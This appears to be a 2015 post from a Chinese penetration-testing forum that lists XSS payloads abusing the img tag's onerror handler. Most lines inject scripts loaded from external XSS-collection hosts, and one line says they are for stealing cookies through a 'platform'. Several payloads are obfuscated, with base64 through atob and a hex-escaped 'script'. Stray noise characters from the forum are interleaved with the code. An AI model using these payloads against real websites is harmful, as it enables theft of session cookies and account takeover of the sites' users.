中国网络渗透测试联盟

标题: img标签的常用几种测试手段 [打印本页]

作者: admin    时间: 2015-10-18 14:33
标题: img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">2 X) l9 g7 M) q( O  D* l
<img src=# onerror=alert(123)>
% c& w* b# l- E& o; R! r6 R<img src=# onerror=alert(document.cookie)>' l- l" B) k1 `/ O" s) L
下面是利用平台钓cookie的
) y4 R2 E9 Y  K* C <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
% B  s# Q+ d3 d" P- m$ ^9 N" i7 \
( `2 N; n: O- ?6 c- w9 C; R
) T' e6 k$ O6 D# g( I<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>3 W. ]" s3 T9 a, ^& F
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
  q( s2 b5 C  f- W* C/ {“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>" T/ m1 E& P; G
<img src=1 onerror=jQuery.getScript("//xss.re/974")> 9 O) n! r6 H) X( j0 F  q
<img src="#">
3 H1 X9 o- m, s+ B( {<img src="#">
% x% W& f; Z9 C& n; T) b<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
" f1 T2 |, F0 L0 c; `5 a+ {7 \<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- w$ p) m4 e5 X. g$ {; }<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
2 U  \9 c- x$ J<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>' j. q. z% \; m7 V' D
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>" A7 P2 ^- z1 E
<img src=x width="0" height="0"></img>0 Z4 b. s$ \4 d2 N6 M
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
/ K, e8 U5 }" Y* U* _8 J  x& r4 A<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>% n' n) K* L4 `0 j2 s6 n





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2